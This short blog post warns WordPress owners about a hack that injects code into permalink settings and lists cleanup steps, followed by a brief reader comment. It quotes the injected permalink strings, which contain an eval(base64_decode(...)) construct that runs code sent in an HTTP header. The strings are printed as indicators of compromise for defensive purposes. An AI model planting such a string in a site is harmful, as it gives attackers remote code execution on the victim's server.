Upgrade Your Wordpress now!
If you havent checked or updated your Wordpress installation in a while, i suggest you RUN over to the nearest PC and check your blog’s permalinks and or RSS feeds for the following:
The presence of %&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
or “/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%
or ‘error on line 22 at column 71: xmlParseEntityRef: no name wordpress’ for your feed
then you are the victim of the new hack attempt targeting our blogs.
Here’s the fix:
- go to wp-admin and goto Setting->Permalinks and delete the above codes from your permalinks
- check your list of administrators
- update your blog to the latest wordpress release, DONT FORGET to backup your mysql and your files
- if you still want to dig deeper and check your db, use this tutorial
If you enjoyed this post, please consider to leave a comment or subscribe to the feed and get future articles delivered to your feed reader.
Thanks for the headsup. I did RUN …
)
Beat